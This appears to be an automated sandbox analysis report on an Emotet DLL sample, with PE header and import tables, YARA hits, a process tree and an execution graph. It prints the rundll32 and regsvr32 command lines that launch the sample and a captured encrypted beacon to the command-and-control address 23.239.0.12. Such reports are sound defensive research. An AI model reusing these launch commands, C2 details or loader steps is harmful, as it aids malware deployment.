                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x520000x3d5f0x3e00False0.355405745968data5.39402464003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                    .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                    RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                                                    RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                                                    ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                                                                                    NameOrdinalAddress
                                                                                                                                    DllRegisterServer10x180042050
                                                                                                                                    DllUnregisterServer20x180042080
                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    May 14, 2022 04:44:02.902405977 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:02.902463913 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:02.902584076 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:02.921334028 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:02.921367884 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:03.466691017 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:03.466928959 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:03.843647957 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:03.843686104 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:03.844244003 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:03.844388008 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:03.855406046 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:03.896534920 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:04.702136993 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:04.702248096 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    May 14, 2022 04:44:04.702331066 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:04.704598904 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:04.712146044 CEST49749443192.168.2.323.239.0.12
                                                                                                                                    May 14, 2022 04:44:04.712182045 CEST4434974923.239.0.12192.168.2.3
                                                                                                                                    • 23.239.0.12
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.34974923.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2022-05-14 02:44:03 UTC0OUTGET / HTTP/1.1
                                                                                                                                    Cookie: qrKqRouLIbia=+JAHxLl8OYS5hw3a/60tSu2H1h9X2OJ54mhCWe5SmyAhKfL8GWOFw669cGkfnZLVb0yMbqJ6rHioy31dS+HwuzFFwYFGwAPPqH2MgAnmjEjTH2ZCD1kuOW4KwP7MER5OcCjrfeC57RTJYrFD7oNsUHCW5BSgfN3VXyx8/dMUV5Nv6TUOLacmecrm0GngY7TmKnLuL3ttJvRYLXmxjbERnwCj30SI3jxXtkUnBCWpgy7T972uAnp8KFqOqabLiorbj2SAQoJZeYAr8b8hyT5yu9yP2vZmUlwFCG/dB+hhupgwMQ6OVrIIGL4zoM7czZbAltxHHSFpv/ZcqrPmrH53
                                                                                                                                    Host: 23.239.0.12
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2022-05-14 02:44:04 UTC0INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Sat, 14 May 2022 02:44:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    2022-05-14 02:44:04 UTC0INData Raw: 33 35 61 0d 0a 71 a8 45 20 44 86 61 25 3c 08 97 b1 58 eb 32 86 de ff 48 d4 bc 78 dc 7d 56 73 82 41 70 ee bb 40 63 17 6f 90 06 80 6e 01 a1 cd 03 a4 f0 4e 6a d2 c4 76 0e ef 0f d7 20 fa 69 e1 0f c8 3b 93 77 e0 42 de 50 ea df 87 c2 ca 5e 38 58 b2 e9 14 a7 c5 f5 4e 41 25 01 04 b4 dc dc 08 16 89 8b 28 38 7d 50 51 ce 95 1b ee 00 ae 2d 71 e9 b5 31 1a 52 f9 23 10 76 84 47 89 26 02 bf 3b 59 99 d2 8a 26 12 eb c9 3f 3c f2 cb 8c a6 38 86 ec af 94 27 44 04 79 7f 6c d3 64 56 24 75 87 f1 e2 8b 25 0f 2a 38 ab e0 36 75 2f 57 66 c6 a8 95 c2 51 f1 9f d2 5d 37 06 1d 34 b4 d0 66 7b fd 85 4b dd fb bf 0f 2f 69 17 d8 6d 29 15 2e 65 60 b0 cc 62 1e 7c 94 f9 cf 37 be 0f 8f e5 1e 3f e5 97 be 7b 34 11 3d 5b ff 40 9f 76 ab 02 24 33 61 3c fc f5 c9 7e d2 ae 1c e7 04 d9 6a d7 70 45 0e 35
                                                                                                                                    Data Ascii: 35aqE Da%<X2Hx}VsAp@conNjv i;wBP^8XNA%(8}PQ-q1R#vG&;Y&?<8'DyldV$u%*86u/WfQ]74f{K/im).e`b|7?{4=[@v$3a<~jpE5


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:04:43:25
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll"
                                                                                                                                    Imagebase:0x7ff7503f0000
                                                                                                                                    File size:140288 bytes
                                                                                                                                    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:04:43:25
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                                                                                                                                    Imagebase:0x7ff67c5f0000
                                                                                                                                    File size:273920 bytes
                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:04:43:26
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                                                                                                                                    Imagebase:0x7ff691ea0000
                                                                                                                                    File size:24064 bytes
                                                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.284795408.0000000001E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:04:43:26
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                                                                                                                                    Imagebase:0x7ff796a20000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.282144230.0000018475EF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:04:43:26
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer
                                                                                                                                    Imagebase:0x7ff796a20000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.283227101.000002451D890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:04:43:30
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer
                                                                                                                                    Imagebase:0x7ff796a20000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.306506166.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.306832170.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000000.287051568.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000000.287330316.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000000.288120370.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000000.288376791.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:04:43:32
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ErRMcfUGTVTj\myfGzaHssmULBwf.dll"
                                                                                                                                    Imagebase:0x7ff691ea0000
                                                                                                                                    File size:24064 bytes
                                                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.790902052.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:04:43:36
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6416 -s 316
                                                                                                                                    Imagebase:0x7ff6c7fd0000
                                                                                                                                    File size:494488 bytes
                                                                                                                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:04:43:36
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:04:43:38
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:04:43:43
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:04:43:44
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:04:43:45
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                    Imagebase:0x7ff7f8820000
                                                                                                                                    File size:163336 bytes
                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:15
                                                                                                                                    Start time:04:43:45
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:04:43:52
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:04:43:58
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:04:44:35
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:04:44:46
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                    Imagebase:0x7ff7b0320000
                                                                                                                                    File size:455656 bytes
                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:04:44:46
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7c9170000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:31
                                                                                                                                    Start time:04:45:06
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:33
                                                                                                                                    Start time:04:45:22
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff73c930000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                      Signature Coverage:16.1%
                                                                                                                                      Total number of Nodes:684
                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                      execution_graph 9669 7ffc67201ee7 9670 7ffc67201f13 RtlAllocateHeap 9669->9670 9671 7ffc67201f3d RtlDeleteBoundaryDescriptor 9670->9671 9672 7ffc67201f5c 9670->9672 9671->9672 9673 560000 9674 560183 9673->9674 9675 56043e VirtualAlloc 9674->9675 9679 560462 9675->9679 9676 560a7b 9677 560531 GetNativeSystemInfo 9677->9676 9678 56056d VirtualAlloc 9677->9678 9683 56058b 9678->9683 9679->9676 9679->9677 9680 560a00 9680->9676 9681 560a56 RtlAddFunctionTable 9680->9681 9681->9676 9682 5609d9 VirtualProtect 9682->9683 9683->9680 9683->9682 9684 180021c3c 9685 180021c97 9684->9685 9688 180001bdc 9685->9688 9687 180021e38 9690 180001c82 9688->9690 9689 180001d21 CreateProcessW 9689->9687 9690->9689 9691 7ffc67202290 9694 7ffc672022b6 9691->9694 9692 7ffc672022f3 9701 7ffc672022be 9692->9701 9745 7ffc671c1230 9692->9745 9694->9692 9694->9701 9703 7ffc67202154 9694->9703 9697 7ffc67202335 9699 7ffc67202154 126 API calls 9697->9699 9697->9701 9698 7ffc671c1230 8 API calls 9700 7ffc67202328 9698->9700 9699->9701 9702 7ffc67202154 126 API calls 9700->9702 9702->9697 9704 7ffc67202162 9703->9704 9705 7ffc672021e1 9703->9705 9750 7ffc67204110 HeapCreate 9704->9750 9707 7ffc6720221e 9705->9707 9713 7ffc672021e5 9705->9713 9708 7ffc67202279 9707->9708 9709 7ffc67202223 9707->9709 9731 7ffc6720216d 9708->9731 9870 7ffc67202f50 9708->9870 9843 7ffc67203108 9709->9843 9715 7ffc67203a48 46 API calls 9713->9715 9713->9731 9716 7ffc67202212 9715->9716 9720 7ffc67202c94 48 API calls 9716->9720 9718 7ffc67202179 _RTC_Initialize 9719 7ffc6720217d 9718->9719 9724 7ffc67202189 GetCommandLineA 9718->9724 9848 7ffc6720415c HeapDestroy 9719->9848 9723 7ffc67202217 9720->9723 9721 7ffc67202243 FlsSetValue 9725 7ffc67202259 9721->9725 9726 7ffc6720226f 9721->9726 9854 7ffc6720415c HeapDestroy 9723->9854 9769 7ffc67203eec 9724->9769 9855 7ffc67202cbc 9725->9855 9864 7ffc67203024 9726->9864 9731->9692 9736 7ffc672021ab 9807 7ffc67202c94 9736->9807 9739 7ffc672021b7 9740 7ffc672021cb 9739->9740 9822 7ffc67203aec 9739->9822 9740->9731 9849 7ffc67203a48 9740->9849 9746 7ffc671c1249 _Wcsftime 9745->9746 9747 7ffc671c1276 9746->9747 9748 7ffc672020e0 __initmbctable 8 API calls 9747->9748 9749 7ffc6720203e 9748->9749 9749->9697 9749->9698 9751 7ffc67202169 9750->9751 9752 7ffc67204134 HeapSetInformation 9750->9752 9751->9731 9753 7ffc67202fa0 9751->9753 9752->9751 9876 7ffc672036f0 9753->9876 9755 7ffc67202fab 9881 7ffc67206970 9755->9881 9758 7ffc67203014 9760 7ffc67202c94 48 API calls 9758->9760 9759 7ffc67202fb4 FlsAlloc 9759->9758 9761 7ffc67202fcc 9759->9761 9762 7ffc67203019 9760->9762 9763 7ffc67203108 __wtomb_environ 45 API calls 9761->9763 9762->9718 9764 7ffc67202fdb 9763->9764 9764->9758 9765 7ffc67202fe3 FlsSetValue 9764->9765 9765->9758 9766 7ffc67202ff6 9765->9766 9767 7ffc67202cbc __doserrno 45 API calls 9766->9767 9768 7ffc67203000 GetCurrentThreadId 9767->9768 9768->9762 9770 7ffc67203f1b GetEnvironmentStringsW 9769->9770 9771 7ffc67203f4d 9769->9771 9773 7ffc67203f29 9770->9773 9774 7ffc67203f35 GetLastError 9770->9774 9772 7ffc67204010 9771->9772 9771->9773 9775 7ffc6720401d GetEnvironmentStrings 9772->9775 9778 7ffc6720219b 9772->9778 9776 7ffc67203f5b GetEnvironmentStringsW 9773->9776 9777 7ffc67203f70 WideCharToMultiByte 9773->9777 9774->9771 9775->9778 9779 7ffc6720402f 9775->9779 9776->9777 9776->9778 9781 7ffc67203fff 9777->9781 9782 7ffc67203fbe 9777->9782 9794 7ffc67203758 GetStartupInfoA 9778->9794 9784 7ffc6720309c __setargv 45 API calls 9779->9784 9783 7ffc67204002 FreeEnvironmentStringsW 